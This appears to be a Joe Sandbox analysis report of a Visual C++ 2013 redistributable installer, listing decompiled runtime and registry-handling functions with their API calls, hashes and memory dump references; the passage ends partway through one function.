Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af62ce12ca70a515d729f3b34de5da672acffcaf1934d4e695cdf86ddde61d5e
Instruction ID: 7644b98f8e8178b82963cf43d71139ba5740fc6520cf10cc741efc55bc76e051
Opcode Fuzzy Hash: af62ce12ca70a515d729f3b34de5da672acffcaf1934d4e695cdf86ddde61d5e
Instruction Fuzzy Hash: BAC012321A0219AB8B006FF8EC4EC8A3BACEB287127008500BA05C3100DA3AE0508B60

Uniqueness

Uniqueness Score: -1.00%

Function 012A8A7B Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E012A8A7B(int _a4) {

				E012A8A50(_a4);
				ExitProcess(_a4);
			}

0x012a8a83
0x012a8a8c

APIs

___crtCorExitProcess.LIBCMT ref: 012A8A83

Part of subcall function 012A8A50: GetModuleHandleW.KERNEL32(mscoree.dll,?,012A8A88,00000000,?,012AB4FF,000000FF,0000001E,00000001,00000000,00000000,?,012ABF87,00000000,00000001,00000000), ref: 012A8A5A
Part of subcall function 012A8A50: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 012A8A6A

ExitProcess.KERNEL32 ref: 012A8A8C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 5fdc2c742acc6c16ef007701e35628487284c5300358a0cc73ebae86ecbfabef
Instruction ID: bb0dc8f395a443e73b1340e8185337f6c38f0f6d4bbb1938f5412fc884a6cb00
Opcode Fuzzy Hash: 5fdc2c742acc6c16ef007701e35628487284c5300358a0cc73ebae86ecbfabef
Instruction Fuzzy Hash: 91B09231000248BBCB152F12EC0D8593FAAEB813A1B904020F8090A021DFB2AD929B84

Uniqueness

Uniqueness Score: -1.00%

Function 012B841F Relevance: 1.6, APIs: 1, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B841F(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t40;

				_t38 = __edx;
				_t37 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_t40 = E012B8123(__ecx, __edx, _a8,  &_v12);
				if(_t40 < 0) {
					L8:
					if(_v8 != 0) {
						RegCloseKey(_v8); // executed
						_v8 = 0;
					}
					if(_v12 != 0) {
						E012B01E8(_v12);
					}
					return _t40;
				}
				_t32 = E012B371B(_a4, _v12, 0x20006, 0, 0,  &_v8,  &_v16); // executed
				_t40 = _t32;
				if(_t40 < 0) {
					goto L8;
				}
				if(_a20 == 0) {
					L4:
					_t33 = E012B3B02(_t37, _t38, _v8,  *0x12d4f44, _a12); // executed
					_t40 = _t33;
					if(_t40 >= 0) {
						_t34 = E012B3B02(_t37, _t38, _v8,  *0x12d4f48, _a16); // executed
						_t40 = _t34;
						if(_t40 >= 0 && _a24 != 0) {
							_t40 = E012B362A(_v8,  *0x12d4f54, _a24);
						}
					}
					goto L8;
				}
				_t36 = E012B3B02(_t37, __edx, _v8, 0, _a20); // executed
				_t40 = _t36;
				if(_t40 < 0) {
					goto L8;
				}
				goto L4;
			}

0x012b841f
0x012b841f
0x012b8430
0x012b8433
0x012b8436
0x012b843e
0x012b8442
0x012b84c1
0x012b84c4
0x012b84c9
0x012b84cf
0x012b84cf
0x012b84d5
0x012b84da
0x012b84da
0x012b84e4
0x012b84e4
0x012b8459
0x012b845e
0x012b8462
0x00000000
0x00000000
0x012b8467
0x012b847b
0x012b8487
0x012b848c
0x012b8490
0x012b849e
0x012b84a3
0x012b84a7
0x012b84bf
0x012b84bf
0x012b84a7
0x00000000
0x012b8490
0x012b8470
0x012b8475
0x012b8479
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 012B8123: lstrlenW.KERNEL32(?,?,?,012B8243,?,?,?,00000000,?,?,?,0129F535,?,?,?,00000000), ref: 012B8146

RegCloseKey.KERNELBASE(00000000,?,8000FFFF,?,?,?,8000FFFF,00000000,?,?,?,00000000,000000B9,012A37C3,?,?), ref: 012B84C9

Part of subcall function 012B371B: RegCreateKeyExW.KERNELBASE(00000001,00000000,00000000,00000000,00000000,00000001,012813BB,?,?,00000001,?,01287275,?,012813BB,00020006,00000001), ref: 012B373F

Part of subcall function 012B3B02: RegSetValueExW.KERNELBASE(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,0128698C,00000000,?,00020006), ref: 012B3B35

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: fc9e849be90c4e43f7abe02ff1bc299f0f0f98aafc988ef2b92d88dd1d328077
Instruction ID: 0251773763c5a5ae137264ec1c33554dc5d85bcdcef8efab25a5d765feb61272
Opcode Fuzzy Hash: fc9e849be90c4e43f7abe02ff1bc299f0f0f98aafc988ef2b92d88dd1d328077
Instruction Fuzzy Hash: 9E213E32C10029FFCF22AF98D8858DEFE79FB44780B114595EA1862024E7354E60EB90

Uniqueness

Uniqueness Score: -1.00%

Function 012ADAF3 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E012ADAF3(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x12d5854, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x12d5d74;
					if( *0x12d5d74 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E012AB573(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E012AA279(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x012adaf8
0x012adafd
0x012adb1a
0x012adb1f
0x012adb21
0x012adb23
0x012adb25
0x012adb25
0x012adb25
0x00000000
0x012adb2d
0x012adb36
0x012adb3c
0x012adb3e
0x00000000
0x00000000
0x012adb72
0x012adb74
0x00000000
0x012adb40
0x012adb40
0x012adb47
0x012adb65
0x012adb68
0x012adb6a
0x012adb6c
0x012adb6c
0x012adb49
0x012adb4a
0x012adb50
0x012adb52
0x012adb26
0x012adb26
0x012adb28
0x012adb2b
0x00000000
0x00000000
0x00000000
0x00000000
0x012adb54
0x012adb54
0x012adb57
0x012adb59
0x012adb5b
0x012adb5b
0x012adb61
0x012adb61
0x012adb52
0x00000000
0x012adaff
0x012adb03
0x012adb06
0x012adb09
0x00000000
0x012adb0b
0x012adb10
0x012adb19
0x012adb19
0x012adb09
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,0128312E,00000000,?,012ABFD1,00000000,0128312E,00000000,00000000,00000000,?,012A9804,00000001,00000214,?,012B8A9C), ref: 012ADB36

Part of subcall function 012AA279: __getptd_noexit.LIBCMT ref: 012AA279

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: f824bfc2830fa8f241c7ed40185bca15901183fc34ece5abb7e5cb38c33ffc80
Instruction ID: 2aeebb0bbd176c9e6fe96b0d0b9d04ec8bac5fe153e801c84bb39ff8ab835af8
Opcode Fuzzy Hash: f824bfc2830fa8f241c7ed40185bca15901183fc34ece5abb7e5cb38c33ffc80
Instruction Fuzzy Hash: BB01D43132221ADBEB258EA9E808F663794FF81760F444A29EA15CB9A0E770D540C750

Uniqueness

Uniqueness Score: -1.00%

Function 012B1FE9 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E012B1FE9(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void* _t3;
				void* _t5;
				intOrPtr* _t7;

				_t7 = _a8;
				_t3 = E012B00D8(_t7, 0x104);
				if(_t3 >= 0) {
					__imp__SHGetFolderPathW(0, _a4, 0, 0,  *_t7); // executed
					if(_t3 >= 0) {
						return E012B1E29(_t5, __edi, _t7);
					}
				}
				return _t3;
			}

0x012b1fed
0x012b1ff6
0x012b1ffd
0x012b200a
0x012b2012
0x00000000
0x012b2015
0x012b2012
0x012b201c

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,0129745F,-0000001C,00000000,00000000,?,?,01298DEB), ref: 012B200A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e892dccbaedcb98835e703149089bf1cf5a3cfd7da6f3a0418ac973f432a48fd
Instruction ID: ab6476d3bf66311fc78880bc990aa28cd321ab3aaf3194d2fc192b1e1b764c85
Opcode Fuzzy Hash: e892dccbaedcb98835e703149089bf1cf5a3cfd7da6f3a0418ac973f432a48fd
Instruction Fuzzy Hash: 5CE0123139132577E6112E956C41FCA7A5DAF29792F004411FB84A9080C6A1B550E7A9

Uniqueness

Uniqueness Score: -1.00%

Function 012A60F1 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012A60F1(void* __eflags, void* _a4) {
				signed int _t11;
				signed int* _t15;

				_t11 =  *0x12d4fd4; // 0x0
				_t15 = E012A5A83( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t11 * 4)) + 4)) + 0x1c, _a4);
				if(_t15 != 0) {
					 *_t15 =  *_t15 | 0xffffffff;
					_t15[2] = _t15[2] & 0x00000000;
					_t15[3] = _t15[3] & 0x00000000;
				}
				if(_a4 != 0xffffffff) {
					FindCloseChangeNotification(_a4); // executed
				}
				return 0;
			}

0x012a60fb
0x012a610f
0x012a6116
0x012a6118
0x012a611b
0x012a611f
0x012a611f
0x012a6127
0x012a612c
0x012a612c
0x012a6135

APIs

FindCloseChangeNotification.KERNELBASE(?,?), ref: 012A612C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7218e65a30077f84d0099552589fb3e3b37e0b9c5e7a41169e7d3a5eb1826930
Instruction ID: f6dab0d57e7c2ad506a09916170d4cb6863e5d8f4dd16375a6fec6bc9771d769
Opcode Fuzzy Hash: 7218e65a30077f84d0099552589fb3e3b37e0b9c5e7a41169e7d3a5eb1826930
Instruction Fuzzy Hash: 02F06D31120205DFDB109F68D88CB247BE0AF08735F4982A0EA298B2E2C735E811CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012A96A2 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,012ABC31,012D5010,00000314,00000000,?,?,?,?,?,012A8E9E,012D5010,Microsoft Visual C++ Runtime Library,00012010), ref: 012A96A4

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 79d7cc406d72f65a912f2597661da95a1a07bb7fec10a61a723c537366357f6c
Instruction ID: 45da782b61acefd8d59cf70ba1209c9474614ce195be94dda41cc22d2801e5c7
Opcode Fuzzy Hash: 79d7cc406d72f65a912f2597661da95a1a07bb7fec10a61a723c537366357f6c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0128131F Relevance: 1.3, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0128131F(void* __ebx, void* __ecx, void* __edx, CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _t23;
				void* _t25;
				void* _t27;
				void* _t28;
				char _t30;
				intOrPtr _t31;

				_t28 = __edx;
				_t27 = __ecx;
				_t30 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t31 =  *0x12d4f64; // 0x0
				if(_t31 == 0) {
					 *0x12d4f64 = 1;
					_t25 = TlsGetValue( *(_a8 + 0x48c));
					if(_t25 == 0 || _t25 == 0xffffffff) {
						_t30 = 0x800700e9;
					} else {
						_t30 = E012B28FD( &_v8,  &_v12, _a4);
						if(_t30 >= 0) {
							_t23 = E01283A94(_t27, _t28, _t25, 0xf0000001, _v8, _v12, 0, 0,  &_v16); // executed
							_t30 = _t23;
							if(_t30 >= 0) {
								_t30 = _v16;
							}
						}
					}
					if(_v8 != 0) {
						E012B24F6(_v8);
					}
					 *0x12d4f64 = 0;
				}
				return _t30;
			}

0x0128131f
0x0128131f
0x01281329
0x0128132b
0x0128132e
0x01281331
0x01281334
0x0128133a
0x01281346
0x01281356
0x0128135a
0x01281399
0x01281361
0x01281371
0x01281375
0x01281389
0x0128138e
0x01281392
0x01281394
0x01281394
0x01281392
0x01281375
0x012813a2
0x012813a7
0x012813a7
0x012813ac
0x012813ac
0x012813b7

APIs

TlsGetValue.KERNEL32(?), ref: 01281350

Part of subcall function 012B28FD: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,01281371,?,?,?), ref: 012B2906
Part of subcall function 012B28FD: _memcpy_s.LIBCMT ref: 012B293A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Value_memcpy_slstrlen
String ID:
API String ID: 32415546-0
Opcode ID: 524ab8463d018569e44bc45f9a276b5abc1467784556b3c2568802a02815fe36
Instruction ID: 78e40559fa026afd05fce54e76daa0d80f4178325f78c25b5107f828894064b8
Opcode Fuzzy Hash: 524ab8463d018569e44bc45f9a276b5abc1467784556b3c2568802a02815fe36
Instruction Fuzzy Hash: 1011A376D11259FFCB21FFA8D888CEEFBB8AB84310F1045A2EA10B3194D2314A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B1171 Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E012B1171(void* __ecx, void* __edx, unsigned int _a4, WCHAR* _a8, int _a12) {
				void* _t10;
				void* _t17;
				unsigned int _t20;

				_t17 = __ecx;
				_t21 = _a4;
				_t8 =  *_a4;
				_t19 = 0;
				if( *_a4 == 0) {
					L4:
					_t15 = _a12;
					if(_a12 == 0) {
						_t15 = lstrlenW(_a8);
					}
					_t10 = E012B04C2(_t15, 1,  &_a4);
					if(_t10 < 0) {
						L10:
						return _t10;
					} else {
						if(_t19 >= _a4) {
							L9:
							_t10 = E012B0C48(_t17,  *_t21, _t19, _a8, _t15, 0, 0, 0x200);
							goto L10;
						}
						_t19 = _a4;
						_t10 = E012B00D8(_t21, _a4); // executed
						if(_t10 < 0) {
							goto L10;
						}
						goto L9;
					}
				}
				_t20 = E012B2382(_t8);
				if(_t20 != 0xffffffff) {
					_t19 = _t20 >> 1;
					goto L4;
				}
				return 0x80070057;
			}

0x012b1171
0x012b1175
0x012b1178
0x012b117b
0x012b117f
0x012b1197
0x012b1198
0x012b119d
0x012b11a8
0x012b11a8
0x012b11b1
0x012b11b8
0x012b11e2
0x00000000
0x012b11ba
0x012b11bd
0x012b11cd
0x012b11dd
0x00000000
0x012b11dd
0x012b11bf
0x012b11c4
0x012b11cb
0x00000000
0x00000000
0x00000000
0x012b11cb
0x012b11b8
0x012b1187
0x012b118c
0x012b1195
0x00000000
0x012b1195
0x00000000

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,012B2746,?,012BA5C8,00000000,?,00000000,00000004,00000000,00000004,?,00000000), ref: 012B11A2

Part of subcall function 012B2382: GetProcessHeap.KERNEL32(00000000,?,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000), ref: 012B238A
Part of subcall function 012B2382: HeapSize.KERNEL32(00000000,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000,?), ref: 012B2391

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 77f8e090d2ab8b8ec96e3aa49a5f298062df4d98cc0600665f4ec11e47b72618
Instruction ID: 14032df5dc7ee975691476d3c2f700d35473a7c4b564bb3528e6685091e63917
Opcode Fuzzy Hash: 77f8e090d2ab8b8ec96e3aa49a5f298062df4d98cc0600665f4ec11e47b72618
Instruction Fuzzy Hash: 92018432270205BBEB115EA9ECD4FEF3B6DEB957E0F104515FF149B180C671E91086A4

Uniqueness

Uniqueness Score: -1.00%

Function 012B5A1F Relevance: 1.3, APIs: 1, Instructions: 29
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B5A1F(WCHAR* _a4, WCHAR* _a8, int _a12, intOrPtr _a16, long _a20) {
				void* _t6;
				void* _t7;

				_t6 = 0x80004005;
				_t7 = 0;
				while(_t7 <= _a16) {
					if(_t7 != 0) {
						Sleep(_a20);
					}
					_t6 = E012B593D(_a4, _a8, _a12); // executed
					if(_t6 != 0x80070002 && _t6 != 0x80070003 && _t6 != 0x80070050 && _t6 != 0x800700b7) {
						_t7 = _t7 + 1;
						if(_t6 < 0) {
							continue;
						}
					}
					break;
				}
				return _t6;
			}

0x012b5a23
0x012b5a28
0x012b5a2a
0x012b5a31
0x012b5a36
0x012b5a36
0x012b5a45
0x012b5a4f
0x012b5a66
0x012b5a69
0x00000000
0x00000000
0x012b5a69
0x00000000
0x012b5a4f
0x012b5a6d

APIs

Sleep.KERNEL32(00000000,?,?,01297736,00000000,?,00000001,00000003,000007D0,?,?,01299676,00000000,00000000,00000000,00000000), ref: 012B5A36

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 14480d90d6027e59650352916a31c9b283455932279d4c53451b57b702849168
Instruction ID: 855ef92c950e6be3b1e381c71d512627ee92623d40f86d3d481e51b00b1c4c33
Opcode Fuzzy Hash: 14480d90d6027e59650352916a31c9b283455932279d4c53451b57b702849168
Instruction Fuzzy Hash: DEE0303206071FD7DB216A8C9CC96DE7E94AB047E0B29C115EF08EE170C226C9A096D6

Uniqueness

Uniqueness Score: -1.00%

Function 012AF5CC Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012AF5CC(void* __ecx, void* __edi, intOrPtr _a4) {
				signed int _t2;
				signed int _t3;
				void* _t4;
				void* _t6;

				if( *0x12d4ef0 != 0xffffffff) {
					_t12 = _a4;
					if(_a4 != 0) {
						E012AF594(__ecx, __edi, _t12);
					}
					_t6 =  *0x12d4ef0; // 0xffffffff
					if(_t6 != 0xffffffff) {
						CloseHandle(_t6);
						 *0x12d4ef0 =  *0x12d4ef0 | 0xffffffff;
					}
				}
				_t2 =  *0x12d5d94; // 0x0
				if(_t2 != 0) {
					E012B01E8(_t2);
					 *0x12d5d94 =  *0x12d5d94 & 0x00000000;
				}
				_t3 =  *0x12d5d98; // 0x0
				if(_t3 == 0) {
					return _t3;
				} else {
					_t4 = E012B01E8(_t3); // executed
					 *0x12d5d98 =  *0x12d5d98 & 0x00000000;
					return _t4;
				}
			}

0x012af5d6
0x012af5d8
0x012af5dc
0x012af5de
0x012af5de
0x012af5e3
0x012af5eb
0x012af5ee
0x012af5f4
0x012af5f4
0x012af5eb
0x012af5fb
0x012af602
0x012af605
0x012af60a
0x012af60a
0x012af611
0x012af618
0x012af628
0x012af61a
0x012af61b
0x012af620
0x00000000
0x012af620

APIs

CloseHandle.KERNEL32(FFFFFFFF,?,012AF637,?,?,?,01281F7C,00000000,?,?,?), ref: 012AF5EE

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 94090b2d4aadb8013cfae0e190878c06aa51f8a32ea758600ef45c62fba8e99c
Instruction ID: fc170c5eed295b75ca4f659328584996a152d954addac9903705045eee05f9af
Opcode Fuzzy Hash: 94090b2d4aadb8013cfae0e190878c06aa51f8a32ea758600ef45c62fba8e99c
Instruction Fuzzy Hash: 01F08270925203ABE734AE6CF58CB2D37A8AB10721F640304A2B8864D8D7B9C452CB64

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01297E2A Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 239
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E01297E2A(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v10;
				intOrPtr _v14;
				intOrPtr _v18;
				short _v20;
				struct _EXCEPTION_POINTERS _v24;
				char _v28;
				char _v32;
				int _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v60;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				intOrPtr _v88;
				void _v100;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t107;
				signed int _t118;
				intOrPtr _t124;
				signed int _t125;
				signed int _t129;
				void* _t136;
				void* _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t145;
				signed int _t146;

				_t136 = __edx;
				_t74 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t74 ^ _t146;
				_v44 = _a8;
				_t139 = __ecx;
				_v52 = __ecx;
				E012A7E30( &_v100, 0, 0x30);
				_t129 = 9;
				_t137 =  &_v136;
				memset(_t137, 0, _t129 << 2);
				_t138 = _t137 + _t129;
				_v20 = 0xcd44;
				_v24 = 0xaac56b;
				_v18 = 0xc28c11d0;
				_v14 = 0xc24fc000;
				_v10 = 0xee95;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				if(E012B1171(0, _t136,  &_v40, _t139, 0) >= 0) {
					_t84 = _v40;
					_t138 = 2;
					while(1) {
						__eflags = 0 -  *_t84;
						if(0 ==  *_t84) {
							break;
						}
						 *_t84 =  *_t84 + 0x20;
						_t84 = _t84 + _t138;
						__eflags = _t84;
					}
					_t85 = E012B5640(_v44, 0, 0, 0, 0);
					__eflags = _t85;
					if(_t85 >= 0) {
						_push(0);
						_push(0);
						_push( &_v28);
						_push(_v44);
						L012AF042();
						_t87 = GetLastError();
						__eflags = _t87 - 0x7a;
						if(_t87 != 0x7a) {
							__eflags = _t87;
							if(__eflags == 0) {
								goto L21;
							} else {
								if(__eflags > 0) {
									_t87 = _t87 & 0x0000ffff | 0x80070000;
									__eflags = _t87;
								}
								_t145 = _t87;
								__eflags = _t145;
								if(_t145 >= 0) {
									_t145 = 0x80004005;
								}
								_push(_t145);
								_push(0x6a3);
								goto L14;
							}
						} else {
							_t124 = E012B233B(_v28, 1);
